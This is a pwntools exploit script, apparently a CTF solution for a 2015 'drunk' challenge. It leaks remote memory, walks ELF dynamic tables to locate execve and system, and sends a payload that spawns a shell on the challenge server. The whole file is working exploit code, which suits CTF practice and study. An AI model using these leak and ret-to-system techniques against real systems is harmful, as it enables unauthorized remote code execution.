Solution for drunk from bcft
from pwn import *
from ctypes import sizeof
ed = elf.datatypes  # ctypes definitions of the ELF32 structures used below
# Challenge endpoint as recorded on the page (a 2015 CTF service).
r = remote("146.148.79.13", 55173)
# First message: a decimal number NUL-padded to 80 bytes, followed by one
# packed 32-bit value.  What the service does with each part is not visible
# in this script.
r.sendline(str(3338240).ljust(80, "\x00")+p32(0x401000))
# Receive for one second and discard whatever the service answers.
r.recvrepeat(1)
@MemLeak
def leak(addr):
    """Read memory at ``addr`` by asking the remote service for it.

    Relies on the module-level connection ``r``.  The ``MemLeak`` wrapper
    turns this raw byte reader into an object with the ``d``/``s``/``n``/
    ``field`` helpers the rest of the script uses.  ``addr`` is sent as a
    signed 32-bit decimal; the reply, with CRLF normalised to LF, is returned
    as the bytes found at that address.
    """
    # Reduce to 32 bits, then express values above INT_MAX as negatives so a
    # remote side that apparently parses a signed integer sees the intended
    # address.
    addr %= 2**32
    if addr > 0x7fffffff:
        addr = -(2**32 - addr)
    r.sendline(str(addr).ljust(16, "A"))
    # Time-based receive: a short or empty reply is passed back unchanged.
    data = r.recvrepeat(0.5)
    # get rid of windows newline.
    return data.replace("\r\n", "\n")
# Hard-coded load address of the module whose program headers are walked
# below (a later comment calls it a Wine library) -- TODO confirm it is the
# same on every run.
ptr = 0x7b800000
#find .dynamic
phdr = ptr + leak.field(ptr, ed.Elf32_Ehdr.e_phoff)
# NOTE(review): the increment happens before the read, so program header 0
# is never examined and at most headers 1..10 are.  If none of them is
# PT_DYNAMIC the loop ends silently with `addr` left at the last header's
# p_vaddr.
for i in range(10):
    phdr += sizeof(ed.Elf32_Phdr)
    typ = leak.field(phdr, ed.Elf32_Phdr.p_type)
    addr = leak.field(phdr, ed.Elf32_Phdr.p_vaddr)
    if(typ == 2):  # PT_DYNAMIC
        break
#find .jmprel, .strtab, and .symtab
# Walk the dynamic section as 8-byte (d_tag, d_val) pairs until DT_NULL.
# `addr` is used directly, i.e. p_vaddr is assumed to already be an absolute
# address -- TODO confirm for this module.  `dynamic` collects every entry
# but is not read again in this script.
dynamic = []
while True:
    typ = leak.d(addr)
    val = leak.d(addr+4)
    dynamic.append((typ, val))
    addr += 8
    if typ == 5:     # DT_STRTAB
        strtab = val
    if typ == 6:     # DT_SYMTAB
        symtab = val
    if typ == 0x17:  # DT_JMPREL
        jmprel = val
    if typ == 0:     # DT_NULL: end of table
        break
# NOTE(review): strtab/symtab/jmprel are bound only if their tags were seen;
# a missing tag shows up later as a NameError rather than here.
#leak all symbols of the wine library.
# Walk the PLT relocation table (8-byte Elf32_Rel entries: r_offset, r_info),
# resolve each entry's symbol name through symtab/strtab and record the
# 32-bit value currently stored at r_offset.  Stops after the entry named
# "execve".
symbols = {}
while True:
    offset = leak.d(jmprel)
    info = leak.d(jmprel+4)
    symidx = info >> 8  # ELF32_R_SYM(r_info)
    sym = symtab + symidx*sizeof(ed.Elf32_Sym)
    name = leak.field(sym, ed.Elf32_Sym.st_name)
    name = leak.s(strtab+name)
    addr = leak.d(offset)
    jmprel += 8
    symbols[name] = addr
    # NOTE(review): the walk is unbounded; if "execve" is not among the
    # relocations the loop keeps reading past the end of the table.
    if name == "execve":
        break
# have execve(a pointer to libc) want address of system
# Start the DynELF resolver from an address 175 pages below the leaked execve
# pointer, presumed to still fall inside the libc mapping (TODO confirm).
d = DynELF(leak, symbols["execve"]-175*0x1000)
system = d.lookup("system")
#verify that it begins with "push reg"
# Python 2 print statement: disassembles the first 10 bytes at `system` so
# the assumption in the comment above can be checked by eye before sending.
print disasm(leak.n(system, 10))
#unaligned jump to system symbol, causing it to use its 2. arg as its first.
r.sendline(str(0x401000).ljust(16)+p32(0x41424344)*8+"sh\x00\x00"+p32(system+1)+"AAAA"*500)
r.recvrepeat(0.5)
# Hand the connection over to the terminal.
r.interactive()